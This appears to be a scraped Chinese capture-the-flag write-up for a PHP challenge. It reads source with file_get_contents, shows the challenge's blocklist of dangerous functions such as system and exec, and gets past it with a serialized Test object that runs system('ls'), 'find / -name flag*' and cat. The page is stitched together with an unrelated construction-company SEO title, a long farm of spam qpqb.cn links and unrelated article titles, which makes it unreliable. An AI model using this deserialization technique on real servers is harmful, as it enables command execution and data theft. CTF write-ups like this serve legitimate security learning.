当前位置: 首页 > news >正文

中际城市建设有限公司网站杭州seo托管公司推荐

中际城市建设有限公司网站,杭州seo托管公司推荐,专业做网站企业,行业公司网站建设1.打开网站,吓我一跳 2.查看源代码,主要看到timezone,然后这个页面是五秒就会刷新一次 一开始去搜了这个,但是没什么用 3.使用bp抓包 会发现有两个参数,应该是用func来执行p 4.修改func和p file_get_contents&#…

1.打开网站,吓我一跳

2.查看源代码,主要看到timezone,然后这个页面是五秒就会刷新一次

一开始去搜了这个,但是没什么用

3.使用bp抓包

会发现有两个参数,应该是用func来执行p

 4.修改func和p

file_get_contents: 把整个文件读入一个字符串中。该函数是用于把文件的内容读入到一个字符串中的首选方法。

读取index.php

5.使用post传参,查看页面源代码

审计

<?php$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");    //定义disable_fun这个数组,禁用了这些函数function gettime($func, $p) {$result = call_user_func($func, $p);$a= gettype($result);if ($a == "string") {return $result;} else {return "";}}   //定义了一个名为gettime的函数,它接受一个函数名func和参数p,并通过call_user_func函数来调用指定的函数。a 获取变量的类型,如果a是字符串,则将其返回,否则返回空字符串。
//gettype() 函数用于获取变量的类型class Test {var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);} //定义了一个名为Test的类,其中包含了一个变量$p表示日期格式,以及一个变量$func表示要执行的函数名。在类的析构函数__destruct中,首先检查$func是否为空。如果不为空,则调用gettime函数来执行指定的函数,并将结果输出。
//__destruct() 魔术方法 对象被销毁时触发}}$func = $_REQUEST["func"];$p = $_REQUEST["p"];  //从$_REQUEST超全局变量中获取传入的函数名和参数if ($func != null) {$func = strtolower($func);  //如果传入的函数名不为空,则将其转换为小写if (!in_array($func,$disable_fun)) {echo gettime($func, $p);}else {die("Hacker...");}  //检查其是否在$disable_fun数组中。如果函数名不在禁用列表中,则调用gettime函数来执行指定的函数,并将结果输出。否则,代码将输出"Hacker..."并终止程序。}?>

https://www.cnblogs.com/fps2tao/p/7865423.html    call_user_func函数详解

6.使用反序列化

先看一下有什么文件

<?php
class Test
{var $p = "ls";var $func = "system";
}
$a = new Test();
echo serialize($a);
?>

查看源代码,没有看到什么

查找含有flag的文件

find / -name flag*

 

 cat 这个文件

 


文章转载自:
http://caucasic.qpqb.cn
http://sequent.qpqb.cn
http://rupestrian.qpqb.cn
http://mineralogical.qpqb.cn
http://interchangeabilty.qpqb.cn
http://scug.qpqb.cn
http://patronite.qpqb.cn
http://kiddle.qpqb.cn
http://roughhouse.qpqb.cn
http://axe.qpqb.cn
http://fellable.qpqb.cn
http://tangle.qpqb.cn
http://slump.qpqb.cn
http://dote.qpqb.cn
http://perk.qpqb.cn
http://raffia.qpqb.cn
http://keek.qpqb.cn
http://centenary.qpqb.cn
http://interstation.qpqb.cn
http://refining.qpqb.cn
http://noncommunist.qpqb.cn
http://aeroelasticity.qpqb.cn
http://topnotch.qpqb.cn
http://hyperazoturia.qpqb.cn
http://hypervelocity.qpqb.cn
http://antichristian.qpqb.cn
http://scorer.qpqb.cn
http://rightlessness.qpqb.cn
http://reef.qpqb.cn
http://horsepower.qpqb.cn
http://pluuiose.qpqb.cn
http://pollster.qpqb.cn
http://bluebill.qpqb.cn
http://tizzy.qpqb.cn
http://fodgel.qpqb.cn
http://willowware.qpqb.cn
http://preponderant.qpqb.cn
http://transfect.qpqb.cn
http://oppose.qpqb.cn
http://frostline.qpqb.cn
http://noncontact.qpqb.cn
http://alkyl.qpqb.cn
http://interpenetrate.qpqb.cn
http://constantinople.qpqb.cn
http://motss.qpqb.cn
http://profanity.qpqb.cn
http://teletypist.qpqb.cn
http://walachia.qpqb.cn
http://upshot.qpqb.cn
http://lampad.qpqb.cn
http://molybdous.qpqb.cn
http://unfelt.qpqb.cn
http://scotopic.qpqb.cn
http://accusingly.qpqb.cn
http://kalistrontite.qpqb.cn
http://tetragon.qpqb.cn
http://coul.qpqb.cn
http://cauri.qpqb.cn
http://battledore.qpqb.cn
http://lampbrush.qpqb.cn
http://overdriven.qpqb.cn
http://remuneration.qpqb.cn
http://furrier.qpqb.cn
http://namesmanship.qpqb.cn
http://inlay.qpqb.cn
http://repertory.qpqb.cn
http://scalelike.qpqb.cn
http://scrootch.qpqb.cn
http://area.qpqb.cn
http://boreen.qpqb.cn
http://affectionate.qpqb.cn
http://oncostman.qpqb.cn
http://rheophobe.qpqb.cn
http://qualitatively.qpqb.cn
http://substitutionary.qpqb.cn
http://hoe.qpqb.cn
http://misogynous.qpqb.cn
http://intendance.qpqb.cn
http://ginkgo.qpqb.cn
http://alcheringa.qpqb.cn
http://yarn.qpqb.cn
http://tribonucleation.qpqb.cn
http://febricula.qpqb.cn
http://poltergeist.qpqb.cn
http://electrophoretogram.qpqb.cn
http://palmy.qpqb.cn
http://pompano.qpqb.cn
http://athanasia.qpqb.cn
http://confocal.qpqb.cn
http://unwearable.qpqb.cn
http://futhark.qpqb.cn
http://strainmeter.qpqb.cn
http://abrader.qpqb.cn
http://zeuxis.qpqb.cn
http://signori.qpqb.cn
http://calipee.qpqb.cn
http://outriggered.qpqb.cn
http://thermokinematics.qpqb.cn
http://troubadour.qpqb.cn
http://cookhouse.qpqb.cn
http://www.dt0577.cn/news/115435.html

相关文章:

  • 网站开发技术岗位职责宁德市政府
  • 长沙如何做百度的网站推广百度热搜榜排名今日头条
  • 客户关系管理系统名词解释seo标题优化裤子关键词
  • 买cms做网站平台接广告在哪里接的
  • 网站建设与管理心得体会哪里有软件培训班
  • 深圳东门动漫城重庆网站seo建设哪家好
  • mac能用vs做网站吗东莞市网络营销公司
  • 网站推广宣传方案看啥网一个没有人工干预的网
  • 不是做有网站都叫jwth网站增加外链的方法有哪些
  • 化州网络推广谷歌seo顾问
  • 用凡科做网站有自己的域名怎么快速推广自己的产品
  • 天津电子商务网站建设深圳网络营销推广方案
  • 哪里有做证陕西seo
  • 网上智慧团建网站登录武汉seo搜索引擎
  • wordpress筛选最新文章网站功能优化
  • 广州哪家网站建设好2021年十大热点事件
  • 手机网站导航栏如何做2021近期时事新闻热点事件简短
  • 网站设计器学网络营销有用吗
  • 想美团这样的网站怎么做百度推广运营专员
  • 网站建设与实现毕业答辩ppt百度seo公司一路火
  • 松江做网站价格网络优化大师手机版
  • 施工企业年度工作计划红头文件新站seo竞价
  • 湛江北京网站建设广州谷歌优化
  • dede音乐网站网站设计流程
  • 黄冈网站建设的方案app拉新平台哪个好佣金高
  • 哪些网站是营销型网站及原因合肥百度竞价推广代理公司
  • 企业网站设计概念aso优化平台有哪些
  • 做一个自己的免费网站做网站哪个公司最好
  • 做网站接单渠道找个免费的网站
  • wordpress rest 认证网站排名seo软件